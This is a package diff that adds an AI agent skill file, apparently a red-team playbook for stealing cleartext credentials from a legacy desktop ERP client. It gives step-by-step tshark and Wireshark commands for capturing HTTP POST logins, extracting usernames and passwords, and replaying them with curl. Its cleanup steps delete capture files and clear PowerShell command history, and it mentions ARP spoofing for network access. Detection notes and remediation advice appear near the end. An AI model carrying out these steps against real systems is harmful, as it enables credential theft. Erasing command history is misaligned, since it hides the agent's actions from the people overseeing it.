rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md

@@ -0,0 +1,373 @@
+---
+name: rt-scenario-d004
+description: "D-004: Desktop App Cleartext Network Traffic → Credential Steal. Domain: desktop. Attack chain: Wireshark capture on app startup → filter by app process → find HTTP (not HTTPS) requests → extract credentials from POST body. MITRE: T1040 → T1552. Real example: Legacy ERP system: login sends user=admin&pass=Password123 in HTTP POST → intercepted in Wireshark"
+---
+
+# D-004: Desktop App Cleartext Network Traffic → Credential Steal
+
+## Overview
+
+- **Attack Objective:** Intercept cleartext credentials transmitted by a desktop application over HTTP, capturing authentication data (usernames, passwords, session tokens) from unencrypted network traffic.
+- **Required Access Level:** None (passive sniffing on local network) / Low (local machine access to run capture tools)
+- **Estimated Time to Execute:** 15–30 minutes (setup + capture during login event)
+- **Detection Risk Level:** Low — passive traffic capture generates no alerts in most environments; no direct interaction with the target system required.
+
+---
+
+## Prerequisites
+
+### Required Tools
+
+| Tool | Purpose | Install Command |
+|------|---------|----------------|
+| Wireshark | GUI packet capture and protocol dissection | `winget install WiresharkFoundation.Wireshark` (Windows) / `sudo apt install wireshark` (Linux) |
+| tshark | CLI companion to Wireshark for scripted capture | Included with Wireshark install |
+| npcap | Windows packet capture driver (required by Wireshark) | Installed automatically with Wireshark on Windows; select "Install Npcap in WinPcap API-compatible Mode" |
+| Process Monitor (ProcMon) | Identify which network interface/PID the app uses | `winget install Microsoft.Sysinternals.ProcessMonitor` |
+| Burp Suite Community (optional) | Alternative interception via proxy for HTTP/HTTPS | `winget install PortSwigger.BurpSuite` |
+| Python 3 (optional) | Parse pcap files with Scapy for automation | `winget install Python.Python.3` then `pip install scapy` |
+
+### Required Access or Conditions
+
+- Local administrator rights (required to install npcap and capture on network interfaces).
+- Physical or logical access to the machine running the desktop application, OR access to a network segment the machine communicates over (e.g., switched network with a span port, hub, or ARP spoofing).
+- The target desktop application must make at least one HTTP (non-TLS) request during the session being captured.
+- Authorized penetration testing engagement with written scope approval.
+
+### Skill Level
+
+**BEGINNER** — Wireshark is GUI-driven; no programming required for basic credential extraction. CLI steps (tshark) are INTERMEDIATE.
+
+---
+
+## Attack Chain
+
+```
+[1] Start Wireshark capture on correct interface
+        |
+        v
+[2] Launch target desktop application
+        |
+        v
+[3] Filter captured traffic by application process or destination IP
+        |
+        v
+[4] Identify HTTP (non-HTTPS, port 80) POST requests in stream
+        |
+        v
+[5] Follow TCP stream / inspect POST body
+        |
+        v
+[6] Extract plaintext credentials from request body
+```
+
+**MITRE ATT&CK Chain:** T1040 (Network Sniffing) → T1552 (Unsecured Credentials)
+
+---
+
+## Step-by-Step Execution
+
+### Step 1 — Identify the Correct Network Interface
+
+Before capturing, confirm which interface carries the application's traffic.
+
+**Option A — Wireshark GUI:**
+1. Open Wireshark.
+2. On the start screen, observe the live traffic sparklines next to each interface.
+3. Note the interface showing activity (typically "Ethernet" or "Wi-Fi").
+
+**Option B — tshark CLI:**
+```cmd
+tshark -D
+```
+
+**Expected output:**
+```
+1. \Device\NPF_{GUID-1} (Ethernet)
+2. \Device\NPF_{GUID-2} (Wi-Fi)
+3. \Device\NPF_Loopback (Adapter for loopback traffic capture)
+```
+
+Note the interface number for the active network adapter.
+
+**Fallback:** If unsure, capture on all interfaces temporarily:
+```cmd
+tshark -i any -w all_interfaces.pcap
+```
+(Linux only; on Windows capture each interface separately.)
+
+---
+
+### Step 2 — Identify the Application's Target IP or Hostname
+
+Before the main capture, do a quick reconnaissance capture while triggering a non-login action in the app (e.g., opening the main screen).
+
+```cmd
+tshark -i 1 -Y "http" -T fields -e ip.dst -e http.host -e http.request.uri
+```
+
+**Expected output:**
+```
+192.168.1.50    erp.company.local    /api/health
+192.168.1.50    erp.company.local    /assets/logo.png
+```
+
+Note the destination IP (`192.168.1.50`) and hostname (`erp.company.local`) for targeted filtering in later steps.
+
+**Fallback:** Use Process Monitor (ProcMon) to find network connections by PID:
+1. Open ProcMon → Filter → Process Name → contains → `erp_client.exe`
+2. Look for "TCP Connect" events to identify destination IP and port.
+
+---
+
+### Step 3 — Start a Targeted Capture Session
+
+**Option A — Wireshark GUI:**
+1. Select the correct interface.
+2. In the capture filter bar (top), enter:
+   ```
+   host 192.168.1.50 and port 80
+   ```
+3. Click the blue shark-fin Start button.
+
+**Option B — tshark CLI (saves to file for later analysis):**
+```cmd
+tshark -i 1 -f "host 192.168.1.50 and port 80" -w capture_erp.pcap
+```
+
+**Expected output (tshark):**
+```
+Capturing on 'Ethernet'
+    1 0.000000000 10.0.0.5 → 192.168.1.50 TCP 66 49201 → 80 [SYN]
+```
+
+Leave the capture running. Do NOT log in yet.
+
+---
+
+### Step 4 — Trigger the Login Event in the Target Application
+
+1. Open the target desktop application (e.g., the legacy ERP client).
+2. Navigate to the login screen.
+3. Enter test credentials (use credentials authorized for testing, e.g., `testuser` / `TestPass!1`).
+4. Click Login / Submit.
+5. Wait for the application to complete the login sequence (success or failure — the POST still fires).
+
+The capture will record all traffic during this interaction.
+
+---
+
+### Step 5 — Filter and Locate the HTTP POST Request
+
+**Option A — Wireshark GUI:**
+1. In the display filter bar, enter:
+   ```
+   http.request.method == "POST"
+   ```
+2. Press Enter.
+3. Look for packets with Info column showing `POST /login` or similar endpoint.
+4. Click the packet to select it.
+5. In the middle pane, expand `Hypertext Transfer Protocol`.
+6. Expand `HTML Form URL Encoded` or `Line-based text data`.
+7. Read the form fields directly.
+
+**Option B — tshark CLI (post-capture analysis):**
+```cmd
+tshark -r capture_erp.pcap -Y "http.request.method == POST" -T fields -e http.request.uri -e http.file_data
+```
+
+**Expected output:**
+```
+/api/auth/login    user=admin&pass=Password123&remember=false
+```
+
+**Fallback — Follow TCP Stream (GUI):**
+If the POST body is not visible directly:
+1. Right-click the HTTP POST packet.
+2. Select "Follow" → "TCP Stream".
+3. The full request/response appears in plain text.
+4. Look for the POST body below the HTTP headers.
+
+**Expected stream view:**
+```
+POST /api/auth/login HTTP/1.1
+Host: erp.company.local
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 42
+
+user=admin&pass=Password123&remember=false
+```
+
+---
+
+### Step 6 — Extract and Record Credentials
+
+Copy the credential fields from the POST body. In the example:
+
+| Field | Value |
+|-------|-------|
+| Username | `admin` |
+| Password | `Password123` |
+| Endpoint | `http://erp.company.local/api/auth/login` |
+| Method | HTTP POST (cleartext, no TLS) |
+
+**Optional — Automated extraction with tshark + Python:**
+```cmd
+tshark -r capture_erp.pcap -Y "http.request.method == POST" -T fields -e http.file_data 2>nul | python -c "import sys, urllib.parse; [print(urllib.parse.unquote_plus(l.strip())) for l in sys.stdin if l.strip()]"
+```
+
+**Expected output:**
+```
+user=admin&pass=Password123&remember=false
+```
+
+---
+
+### Step 7 — Validate Captured Credentials (Optional, in Scope Only)
+
+If the engagement scope permits credential validation:
+```cmd
+curl -X POST http://erp.company.local/api/auth/login -d "user=admin&pass=Password123" -v
+```
+
+**Expected output indicating valid credentials:**
+```
+HTTP/1.1 200 OK
+Set-Cookie: session=eyJhbGciOiJIUzI1NiJ9...
+{"status":"ok","role":"administrator"}
+```
+
+---
+
+## Real-World Reference
+
+**Legacy ERP System — Cleartext Login:**
+
+A legacy ERP desktop client (common in manufacturing and logistics environments, often built pre-2010) connects to an on-premises application server. The client was developed before TLS adoption was standard practice and communicates over plain HTTP on port 80.
+
+During a penetration test:
+1. Tester starts Wireshark on the client workstation.
+2. The ERP application is launched and the tester logs in.
+3. Wireshark captures: `POST /erp/login HTTP/1.1` with body `user=admin&pass=Password123`.
+4. The `admin` account has full access to financial records, HR data, and system configuration.
+5. The credentials are also reused across other internal systems (credential stuffing risk).
+
+**Impact:** Full application compromise, data exfiltration, lateral movement to other systems sharing the same credentials.
+
+**Root Cause:** Application was never updated to use HTTPS; no network-layer encryption enforcement (no HSTS, no TLS-only policy on the server).
+
+---
+
+## MITRE ATT&CK Mapping
+
+| Step | Tactic | Technique ID | Technique Name | Sub-technique |
+|------|--------|-------------|----------------|---------------|
+| 1–3: Identify interface and start capture | Collection | T1040 | Network Sniffing | — |
+| 4: Trigger login event | Credential Access | T1078 | Valid Accounts | T1078.003 (Local Accounts) — used to log in during testing |
+| 5: Filter HTTP POST traffic | Collection | T1040 | Network Sniffing | — |
+| 6: Extract credentials from POST body | Credential Access | T1552 | Unsecured Credentials | T1552.004 (Private Keys) / T1552.001 (Credentials in Files — analogous for in-transit data) |
+| 7: Validate credentials | Credential Access | T1110 | Brute Force | T1110.001 (Password Guessing — single attempt validation) |
+
+**Primary Chain:** T1040 → T1552
+
+---
+
+## Detection & OPSEC
+
+### How This Attack Is Detected
+
+| Detection Method | Detail |
+|-----------------|--------|
+| Endpoint DLP / IDS | Network IDS rules (Snort/Suricata) can flag cleartext credential patterns (`user=` + `pass=` in HTTP POST body). |
+| SIEM correlation | Wireshark/tshark process execution on a workstation may trigger alerts if process monitoring (Sysmon Event ID 1) is in place. |
+| Network monitoring | SOC analysts reviewing NetFlow data may notice unusual capture tool behavior or promiscuous mode on a NIC. |
+| EDR alerts | CrowdStrike, Defender for Endpoint, and similar tools may detect npcap installation or tshark execution as anomalous. |
+
+### How to Reduce Detection Risk During Authorized Engagement
+
+- Coordinate with the blue team to whitelist the test machine's IP and the tester's activity window before testing.
+- Use a dedicated test workstation that is already scoped for the engagement, not a production machine.
+- Prefer tshark over Wireshark GUI — lower GUI surface area, easier to contain scope.
+- Apply precise capture filters (`host X and port 80`) to limit capture scope and reduce data collected.
+- Do not capture traffic beyond the authorized scope window.
+- Avoid running captures during business hours if stealth testing is not in scope.
+
+### Artifacts Left Behind
+
+| Artifact | Location | Notes |
+|----------|----------|-------|
+| `.pcap` capture file | Path specified in `-w` flag (e.g., `capture_erp.pcap`) | Contains raw network packets including credentials |
+| npcap driver | `C:\Windows\System32\drivers\npcap.sys` | Installed as part of Wireshark install |
+| Wireshark recent files list | `%APPDATA%\Wireshark\recent` | Lists recently opened pcap files |
+| tshark command history | PowerShell/cmd history (`%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`) | Contains capture commands |
+| Wireshark preferences | `%APPDATA%\Wireshark\preferences` | Configuration artifacts |
+
+---
+
+## Cleanup
+
+Perform these steps after the engagement to remove artifacts from the test machine.
+
+### 1 — Delete Capture Files
+```powershell
+Remove-Item -Path "C:\path\to\capture_erp.pcap" -Force
+Remove-Item -Path "$env:TEMP\*.pcap" -Force -ErrorAction SilentlyContinue
+```
+
+### 2 — Clear PowerShell Command History
+```powershell
+Remove-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
+```
+
+### 3 — Clear Wireshark Recent Files and Preferences
+```powershell
+Remove-Item "$env:APPDATA\Wireshark\recent" -Force -ErrorAction SilentlyContinue
+Remove-Item "$env:APPDATA\Wireshark\recent_common" -Force -ErrorAction SilentlyContinue
+```
+
+### 4 — Uninstall Wireshark and npcap (if installed solely for the engagement)
+```powershell
+# Uninstall Wireshark
+winget uninstall WiresharkFoundation.Wireshark
+
+# Uninstall npcap
+$npcap = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -like "*Npcap*" }
+if ($npcap) { $npcap.Uninstall() }
+```
+
+### 5 — Clear cmd/PowerShell Session History
+```powershell
+[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
+```
+
+### 6 — Verify No pcap Files Remain
+```powershell
+Get-ChildItem -Path C:\ -Recurse -Filter "*.pcap" -ErrorAction SilentlyContinue
+```
+
+Expected: no output (no pcap files found).
+
+---
+
+## References
+
+### Tools
+- [Wireshark Official Documentation](https://www.wireshark.org/docs/)
+- [tshark Man Page](https://www.wireshark.org/docs/man-pages/tshark.html)
+- [npcap — Nmap Project](https://npcap.com/)
+- [Scapy Documentation](https://scapy.readthedocs.io/)
+- [Burp Suite Community Edition](https://portswigger.net/burp/communitydownload)
+- [Sysinternals Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)
+
+### MITRE ATT&CK References
+- [T1040 — Network Sniffing](https://attack.mitre.org/techniques/T1040/)
+- [T1552 — Unsecured Credentials](https://attack.mitre.org/techniques/T1552/)
+- [T1078 — Valid Accounts](https://attack.mitre.org/techniques/T1078/)
+- [T1110 — Brute Force](https://attack.mitre.org/techniques/T1110/)
+
+### Remediation Guidance (for Report)
+- Enforce TLS 1.2+ on all application server endpoints; disable HTTP (port 80) or redirect to HTTPS.
+- Implement HSTS (HTTP Strict Transport Security) on the server.
+- Conduct a network traffic audit of all legacy desktop clients.
+- Enforce certificate pinning in the desktop client where feasible.
+- Segment the legacy application onto an isolated VLAN with restricted access.